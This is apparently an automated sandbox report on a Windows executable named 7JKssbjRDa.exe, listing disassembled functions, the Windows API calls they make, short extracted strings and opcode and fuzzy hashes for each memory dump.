WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CD6A

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
Instruction ID: e182fa176b596d651ba3484f1012657cf00b5fef4cb1dd311ab1bc31a0a6f155
Opcode Fuzzy Hash: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
Instruction Fuzzy Hash: 53F030368002A9BBEF125F95CC48EC93FA6FB0D3E0F018025FA0885130DA32C9609B90

Function 004091F8 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,00409195,00000064), ref: 0040921B
RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409225
WaitForSingleObjectEx.KERNEL32(0040104A,00000000,?,00409195,00000064,?,?,?,0040104A,0042BB40), ref: 00409236
RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040923D

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: 6ea53ab934fb8a3dcf50dd5c11f10886be54903c7cc97662d191e9518fa7b0c1
Instruction ID: 40c2fce60939aafa0776eae2e2369d18d4b8ec69fabe1ce25dfd7c9304a85116
Opcode Fuzzy Hash: 6ea53ab934fb8a3dcf50dd5c11f10886be54903c7cc97662d191e9518fa7b0c1
Instruction Fuzzy Hash: 67E092B1B40234BBCB112B90FE08ACD7F24EB0CB51B458072FD0666161C77D09228BDE

Function 00410A46 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00410A4F

Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA

_free.LIBCMT ref: 00410A62
_free.LIBCMT ref: 00410A73
_free.LIBCMT ref: 00410A84

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7b30c710dcdd7188d0b07851f7036ca18a8931f72254c168f329d64b926ff840
Instruction ID: 4f604ca58aada12d27b251242fa97a7c83cac521b99ee6611507b97af23f288b
Opcode Fuzzy Hash: 7b30c710dcdd7188d0b07851f7036ca18a8931f72254c168f329d64b926ff840
Instruction Fuzzy Hash: 46E0EC71B13360AA8632AF15BD41589FFA1EFD4B543C9003BF50812631D73909939BCE

Function 04B50CAD Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 04B50CB6

Part of subcall function 04B51D29: HeapFree.KERNEL32(00000000,00000000,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?), ref: 04B51D3F
Part of subcall function 04B51D29: GetLastError.KERNEL32(?,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?,?), ref: 04B51D51

_free.LIBCMT ref: 04B50CC9
_free.LIBCMT ref: 04B50CDA
_free.LIBCMT ref: 04B50CEB

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: adaab86243d259393613f04f27d957ce20d16d85c081b3fe77030dc48aa8ee98
Instruction ID: 2a638163b3dbc4a5c9aadf3cbc1385501b8d40215370a85339a438bd3f7c2bfd
Opcode Fuzzy Hash: adaab86243d259393613f04f27d957ce20d16d85c081b3fe77030dc48aa8ee98
Instruction Fuzzy Hash: 52E0EC79E13334AAD6366F18BD40649FF69EBD8B143C50076E83012270C7322553ABCE

Function 04CFFE46 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 04CFFE4F
_free.LIBCMT ref: 04CFFE62
_free.LIBCMT ref: 04CFFE73
_free.LIBCMT ref: 04CFFE84

Memory Dump Source

Source File: 00000000.00000003.2523875768.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4cf0000_7JKssbjRDa.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: adaab86243d259393613f04f27d957ce20d16d85c081b3fe77030dc48aa8ee98
Instruction ID: 12f4833f8b8a1d31d6e10bc5345a735741ec32fe814f549f0ad83bf325a8db3d
Opcode Fuzzy Hash: adaab86243d259393613f04f27d957ce20d16d85c081b3fe77030dc48aa8ee98
Instruction Fuzzy Hash: CBE0EC71B13320AA97336F14BD40A4AFF61EBD4B143C5803AE50023271C77629539BDE

Function 100067E8 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 100067F1

Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64

_free.LIBCMT ref: 10006804
_free.LIBCMT ref: 10006815
_free.LIBCMT ref: 10006826

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: debb3193547cbbcb7717f1e4cdc42473b8e46860ea64e0849bed9af40c6c58a4
Instruction ID: 2a5a278bef7b5ad6e03033ca92f6b3e0bb2fc7991e1f46602c590ec50041d4ba
Opcode Fuzzy Hash: debb3193547cbbcb7717f1e4cdc42473b8e46860ea64e0849bed9af40c6c58a4
Instruction Fuzzy Hash: FBE0E675D10131BAF711EF249C8644E3FA1F799A503068015F528222B7C7369751DFE3

Function 0041017D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\7JKssbjRDa.exe, xrefs: 004101C0, 004101C7, 004101FD

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\7JKssbjRDa.exe
API String ID: 0-3135480320
Opcode ID: 071b538174e6ec2062faa24906a4cfa7e50636e93d54360a723864c0abc3d007
Instruction ID: ef1b21c86d4c641325268a2e562e5aacaa8476dc5588200f607cc18d3bf73bc2
Opcode Fuzzy Hash: 071b538174e6ec2062faa24906a4cfa7e50636e93d54360a723864c0abc3d007
Instruction Fuzzy Hash: A8416471E00214ABCB219B999C85AEFBBF8EFD4350B1440ABF50497251D7B99EC1CB98

Function 04B503E4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\7JKssbjRDa.exe, xrefs: 04B50427, 04B5042E, 04B50464

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\Desktop\7JKssbjRDa.exe
API String ID: 0-3135480320
Opcode ID: 9c4445743612698079b74687b6d690de0a76c3e5134965afe2d5fa7eb50f9b57
Instruction ID: a738876d3c2ff8ac166625f641da9be7d3e0f88f925c14354a04c58037eea498
Opcode Fuzzy Hash: 9c4445743612698079b74687b6d690de0a76c3e5134965afe2d5fa7eb50f9b57
Instruction Fuzzy Hash: 6D416671A00218AFDB21EF9DDC81AAEFBB8EFC5314B5000A6E805D7261E770AA41DB54

Function 10006038 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\7JKssbjRDa.exe, xrefs: 1000607B, 10006082, 100060B8

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\7JKssbjRDa.exe
API String ID: 0-3135480320
Opcode ID: 4a8ba0bb3459913fcd586df3a76a6e4d0e3c9f4097a590b62cd75fbc9ff119e1
Instruction ID: cc2ecb4b5d0b55cd4a25e2381517e3645a439caaa5f14caae8cc7f97f4731dcb
Opcode Fuzzy Hash: 4a8ba0bb3459913fcd586df3a76a6e4d0e3c9f4097a590b62cd75fbc9ff119e1
Instruction Fuzzy Hash: 9241AD75E00215BBEB11CB99CC8199FBBF9EF89390B244066F901A7216D6719B80CB90

Function 04B4AE47 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 04B4AE86
__IsNonwritableInCurrentImage.LIBCMT ref: 04B4AF3A

Strings

csm, xrefs: 04B4AF24

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
Instruction ID: d8fea0a21baf093387e28021d95f836c02d33f5530b8aa594742145cc105e3b7
Opcode Fuzzy Hash: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
Instruction Fuzzy Hash: CA41C470A40218ABCF10DF68C884A9EBFB4EF89318F1485D5EC18AB351D735FA15DBA1

Function 0040B485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 0040B4AA

Strings

MOC, xrefs: 0040B4BC
RCC, xrefs: 0040B4C4

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
Instruction ID: 67f376c023d9800a5206fdaf198d645220277734bcfb559d46511f35e7f4eabb
Opcode Fuzzy Hash: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
Instruction Fuzzy Hash: 95415871900209AFDF15DF94CD81AAEBBB5EF48308F1480AAFA1576291D3399A50DB98

Function 04B4B6EC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 04B4B711

Strings

RCC, xrefs: 04B4B72B
MOC, xrefs: 04B4B723

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
Instruction ID: 923960378f10a42f4d89f9f1eca47e0f2ee5ca5c2c0ddb50a050844d7370f4e8
Opcode Fuzzy Hash: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
Instruction Fuzzy Hash: 53415871900209AFDF15CF98C881AEEBBB5FF88314F158099FA15A7211D335F950EB50

Function 100044D6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 100044FB

Strings

MOC, xrefs: 1000450D
RCC, xrefs: 10004515

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
Instruction ID: 0fa13f4c886c2deeb8e1184eea68dc96f9460117e0f406c7378fe553058e7938
Opcode Fuzzy Hash: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
Instruction Fuzzy Hash: 7B419DB5900109AFEF06CF94CC81AEE7BB5FF48384F168059F9046B25AD736EA50CB55

Function 00401330 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8

__Init_thread_footer.LIBCMT ref: 004013BB

Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA

Strings

NE]D, xrefs: 00401350
FEKN, xrefs: 0040138A

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
String ID: FEKN$NE]D
API String ID: 2296764815-517842756
Opcode ID: 58799410568a96232f7d03a0f48a1c330f944dde0b463f883dfd6296e8a80a12
Instruction ID: bb411daeb84ba6cc8782813aab56c5dc80a7b29e6052d91cba9c4b608feb04e2
Opcode Fuzzy Hash: 58799410568a96232f7d03a0f48a1c330f944dde0b463f883dfd6296e8a80a12
Instruction Fuzzy Hash: 51215C30B00245CBD720CF29E846BA977B0FB95304F94427AD8542B7A3DBB92586C7DD

Function 04B41597 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
Part of subcall function 04B493D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B4941F

__Init_thread_footer.LIBCMT ref: 04B41622

Part of subcall function 04B4938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B49397
Part of subcall function 04B4938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B493CA

Strings

NE]D, xrefs: 04B415B7
FEKN, xrefs: 04B415F1

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer
String ID: FEKN$NE]D
API String ID: 4132704954-517842756
Opcode ID: 7d1b909681db53285071ff40672d1c380c008a281c48190cd621e0695607241e
Instruction ID: c6b6ce85a24c3fb136392ac9d6bd6c39d7965e59de907ef64728266f1d67071b
Opcode Fuzzy Hash: 7d1b909681db53285071ff40672d1c380c008a281c48190cd621e0695607241e
Instruction Fuzzy Hash: D3214870B00245CBEB20DF38E849BA977A0EFD5308F9442A9D8141B261EBB57586D7CE

Function 04CF0730 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 04CF07BB

Strings

FEKN, xrefs: 04CF078A
NE]D, xrefs: 04CF0750

Memory Dump Source

Source File: 00000000.00000003.2523875768.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4cf0000_7JKssbjRDa.jbxd

Similarity

API ID: Init_thread_footer
String ID: FEKN$NE]D
API String ID: 1385522511-517842756
Opcode ID: 7d1b909681db53285071ff40672d1c380c008a281c48190cd621e0695607241e
Instruction ID: 4a3ff25f89580d27e5092a2c1f9e2e3ab16a9b8995b014d160fc7b73ff1bc844
Opcode Fuzzy Hash: 7d1b909681db53285071ff40672d1c380c008a281c48190cd621e0695607241e
Instruction Fuzzy Hash: 78215A30B00645CBE720DF28EC45BA837A1FB45308FD44279D9145B362EBB93685CBD9

Function 00407CC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8

__Init_thread_footer.LIBCMT ref: 00407D2E

Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA

Strings

_DC[, xrefs: 00407CD7
CD^O, xrefs: 00407CE0

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
String ID: CD^O$_DC[
API String ID: 2296764815-3597986494
Opcode ID: 771681945fa34edd6e0e28174c2ffae172e3917e716f88e7e73ce5ca880ecdaf
Instruction ID: 8bf2ad3165393ed28199ca71651b1e02a490a28405ec2f0c6d2e7b73ba48d91c
Opcode Fuzzy Hash: 771681945fa34edd6e0e28174c2ffae172e3917e716f88e7e73ce5ca880ecdaf
Instruction Fuzzy Hash: 1C012630F002059BC720EF6AAD0196973B4FB59300B84017AE5146B282E77899428BDE

Function 00407700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8

__Init_thread_footer.LIBCMT ref: 0040776E

Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA

Strings

CD^O, xrefs: 00407720
_DC[, xrefs: 00407717

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
String ID: CD^O$_DC[
API String ID: 2296764815-3597986494
Opcode ID: 24f4af3076efdbe76c4f67dfe6ec8bc4985c003615b93ea008d725939ba6da37
Instruction ID: 44c7e97e152ec1ca5567fde67ff81d8d8e81e117548a1af78ec12ab7f1e6b2a3
Opcode Fuzzy Hash: 24f4af3076efdbe76c4f67dfe6ec8bc4985c003615b93ea008d725939ba6da37
Instruction Fuzzy Hash: 64012670F002089BC720FF69AD41A5973B0E708350F80827EE5196B292EB786941CBCA

Function 04B47F27 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
Part of subcall function 04B493D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B4941F

__Init_thread_footer.LIBCMT ref: 04B47F95

Part of subcall function 04B4938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B49397
Part of subcall function 04B4938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B493CA

Strings

_DC[, xrefs: 04B47F3E
CD^O, xrefs: 04B47F47

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer
String ID: CD^O$_DC[
API String ID: 4132704954-3597986494
Opcode ID: f117a8599e5a5b64357cd679555c90fdeb56fb08607ed05f2cce84a05c41c654
Instruction ID: 6d54276575cec01648bb8cdcd8c95df3e6207059145abe7d593a67d09d2ef70c
Opcode Fuzzy Hash: f117a8599e5a5b64357cd679555c90fdeb56fb08607ed05f2cce84a05c41c654
Instruction Fuzzy Hash: F30126B0B002049BC720EF79BD0099973B4EBC4304F9401B9D12857250DB74B4419BD9

Function 04B47967 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
Part of subcall function 04B493D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B4941F

__Init_thread_footer.LIBCMT ref: 04B479D5

Part of subcall function 04B4938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B49397
Part of subcall function 04B4938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B493CA

Strings

CD^O, xrefs: 04B47987
_DC[, xrefs: 04B4797E

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer
String ID: CD^O$_DC[
API String ID: 4132704954-3597986494
Opcode ID: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
Instruction ID: afbe0b1e3a5232ec8fc45a5e0e38780b7958d014a02b47b1471e8b13860023b7
Opcode Fuzzy Hash: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
Instruction Fuzzy Hash: AA0149B0B00208DBCB20FFB8BD40A5D73B0EB44314F8082EAD11957290DB747441DBC9

Function 04CF70C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 04CF712E

Strings

_DC[, xrefs: 04CF70D7
CD^O, xrefs: 04CF70E0

Memory Dump Source

Source File: 00000000.00000003.2523875768.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4cf0000_7JKssbjRDa.jbxd

Similarity

API ID: Init_thread_footer
String ID: CD^O$_DC[
API String ID: 1385522511-3597986494
Opcode ID: f117a8599e5a5b64357cd679555c90fdeb56fb08607ed05f2cce84a05c41c654
Instruction ID: 1731ede49108323c556952bbfab0d93331e320457b3e6952282b60f1bb63ecc1
Opcode Fuzzy Hash: f117a8599e5a5b64357cd679555c90fdeb56fb08607ed05f2cce84a05c41c654
Instruction Fuzzy Hash: 5E014930F002049BD760FF68BC009AC73B6F744304FD84179D61857240EB7879459BD9

Function 04CF6B00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 04CF6B6E

Strings

_DC[, xrefs: 04CF6B17
CD^O, xrefs: 04CF6B20

Memory Dump Source

Source File: 00000000.00000003.2523875768.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4cf0000_7JKssbjRDa.jbxd

Similarity

API ID: Init_thread_footer
String ID: CD^O$_DC[
API String ID: 1385522511-3597986494
Opcode ID: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
Instruction ID: 747a83191185ad56394dded9cb9ba93b3f1b74eca79b9a3740be4b17d2eb17e9
Opcode Fuzzy Hash: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
Instruction Fuzzy Hash: A4014970F002089BCB20FFA8AD4066CB3B1E704314F808279D61857250EB387945ABD5

Function 004070B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8

__Init_thread_footer.LIBCMT ref: 00407119

Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA

Strings

DCDO, xrefs: 004070C6
EDO*, xrefs: 004070CD

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
String ID: DCDO$EDO*
API String ID: 2296764815-3480089779
Opcode ID: 48c2273e01edcb6ac59bbf7f24ff2868174c6a2c348a1f98b1917ebd6891d996
Instruction ID: 6e88f7cd3849569d85f07cd18ee47690fbb1a730dcdea08f10a2250dba35ba50
Opcode Fuzzy Hash: 48c2273e01edcb6ac59bbf7f24ff2868174c6a2c348a1f98b1917ebd6891d996
Instruction Fuzzy Hash: 1F0186B0F01208AFC710DF55E98255DB7B0E705304F90457ADA15AB3D1DB386D95CB8D

